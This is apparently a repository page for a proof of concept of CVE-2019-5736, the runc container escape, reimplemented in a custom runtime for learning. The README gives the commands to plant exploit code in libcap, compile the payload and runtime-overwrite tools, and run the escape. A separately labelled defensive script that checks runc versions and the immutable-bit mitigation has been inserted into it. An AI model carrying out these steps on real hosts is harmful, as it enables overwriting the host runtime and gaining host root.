
CVE-2019-5736 PoC — Docker OS command injection vulnerability

Associated Vulnerability
Title: Docker OS command injection vulnerability (CVE-2019-5736)
Description: runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.
Description
CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.
Readme
# CVE-2019-5736-Custom-Sandbox

## General

CVE-2019-5736 implemented using a shallow, self-written container runtime to understand the exploit.

The exploit is based on (and almost entirely copied from) the runc PoC by Twistlock: https://github.com/twistlock/RunC-CVE-2019-5736/tree/master/malicious_image_POC

## Container Runtime (quarantine)

See code docs for further details.

```sh
Usage: quarantine [OPTIONS] [BINARY and its ARGS]

--rootfs: (mandatory) Specify a rootfs for the container.
--urange: Specify a urange start_host:end_host,start_guest.
--grange: Specify a grange start_host:end_host,start_guest.
--uid:    Specify the desired UID in the container.
--gid:    Specify the desired GID in the container.
--supp:   Append supplementary groups from the specified grange to the process running in the container.
```

The runtime unshares all namespaces except the user namespace. The user namespace is only unshared under specific conditions, namely when `--urange`, `--grange`, `--uid` and/or `--gid` are specified.

## Setup for the exploit

This was tested and done on Ubuntu 18.04.

1. Get a rootfs (bionic, for example)
    - `mkdir rootfs`
    - `sudo debootstrap bionic ./rootfs`
2. Get the libcap source
    - `git clone https://github.com/mhiramat/libcap`
3. Modify libcap
    - `cat exploit_code_for_shared_lib.c >> <any cap*.c, I used cap_alloc.c>`
    - `make`
4. chroot into the rootfs and install libcap-dev so you can simply link to the modified `libcap.so`
    - `sudo chroot rootfs`
    - `apt install libcap-dev`
5. Copy the created `libcap.so.2.25` file into the appropriate rootfs directory
    - `sudo cp libcap.so.2.25 rootfs/lib/x86_64-linux-gnu`
    - *Note*: For me, there already was a link pointing at that exact libcap file version, so I didn't have to link it
    - *Note*: This path might change; always check where the compiled `quarantine` binary expects libcap to be: `ldd quarantine`
6. Compile and copy the other files into the rootfs
    - `sudo cp shebang_exploit rootfs/`
    - `sudo gcc -o rootfs/root/payload payload.c`
    - `sudo gcc -o rootfs/overwrite_sndbx_runtime overwrite_sndbx_runtime.c`

## Run exploit

For example: `sudo ./quarantine --rootfs rootfs /shebang_exploit` or `./quarantine --rootfs rootfs --uid 1 /shebang_exploit`.

It works as long as the process either keeps `CAP_DAC_OVERRIDE` or `CAP_SYS_ADMIN` in the host's user namespace (i.e. when running with sudo, do not unshare the user namespace, since that drops capabilities relative to the parent namespace), or owns the target file on the host.
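As an added example, not part of this PoC repository or of the runc project: a host-side posture check written from the defender's side. It takes the README's own precondition above (the runtime binary must be overwritable from inside the container) and turns it into two things an operator can verify on a Docker host: whether the installed runc reports a version in the unfixed release range, and whether the published immutable-bit mitigation (`chattr +i` on the runtime binary) is in place. The candidate binary paths, the `runc --version` output format and the use of `lsattr` are assumptions.

```shell
#!/bin/sh
# Host posture check for CVE-2019-5736 (constructed example, not part of the PoC repo).
# Assumptions: runc-style "runc version X.Y.Z-rcN" output, the usual Docker/runc
# binary paths, and lsattr (e2fsprogs) available for the immutable-bit check.

# True (0) when the version is at or below 1.0-rc6, the last unfixed upstream
# release. Distros and Docker ("+dev" builds) backport fixes, so treat a
# "vulnerable" answer as "verify the build", not as proof.
runc_version_vulnerable() {
    case "$1" in
        0.*|1.0-rc[1-6]|1.0-rc[1-6][+-]*|1.0.0-rc[1-6]|1.0.0-rc[1-6][+-]*) return 0 ;;
        *) return 1 ;;
    esac
}

# True (0) when the file carries the ext immutable attribute (chattr +i), a
# published mitigation: the file cannot be opened for writing even by host root.
binary_immutable() {
    attrs=$(lsattr -d "$1" 2>/dev/null | cut -d' ' -f1) || return 1
    case "$attrs" in *i*) return 0 ;; *) return 1 ;; esac
}

# Report one runtime binary: returns 0 when absent or immutable, 1 when exposed.
check_runtime_binary() {
    [ -e "$1" ] || { echo "$1: not present"; return 0; }
    if binary_immutable "$1"; then
        echo "$1: immutable attribute set, overwrite from a container is blocked"
        return 0
    fi
    echo "$1: no immutable bit; container root keeping CAP_DAC_OVERRIDE could replace it"
    return 1
}

# Walk the host: version range, then the immutable bit on each candidate binary.
check_host() {
    rc=0
    if command -v runc >/dev/null 2>&1; then
        ver=$(runc --version 2>/dev/null | sed -n 's/^runc version //p' | head -n 1)
        if runc_version_vulnerable "$ver"; then
            echo "runc $ver: in the unfixed range, upgrade or confirm a backported fix"
            rc=1
        else
            echo "runc $ver: outside the unfixed release range"
        fi
    fi
    for b in /usr/bin/runc /usr/sbin/runc /usr/bin/docker-runc /usr/local/sbin/runc; do
        check_runtime_binary "$b" || rc=1
    done
    return $rc
}
case "${1:-}" in --run) check_host ;; esac
```

Run it as `sh check_runc.sh --run`; a non-zero exit status means at least one check failed.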
File Snapshot

/data/pocs/434a1a14ecb069740169188733444e275130e556
├── [ 924] exploit_code_for_shared_lib.c
├── [2.9K] overwrite_sndbx_runtime.c
├── [ 17K] quarantine.cpp
└── [2.4K] README.md

0 directories, 4 files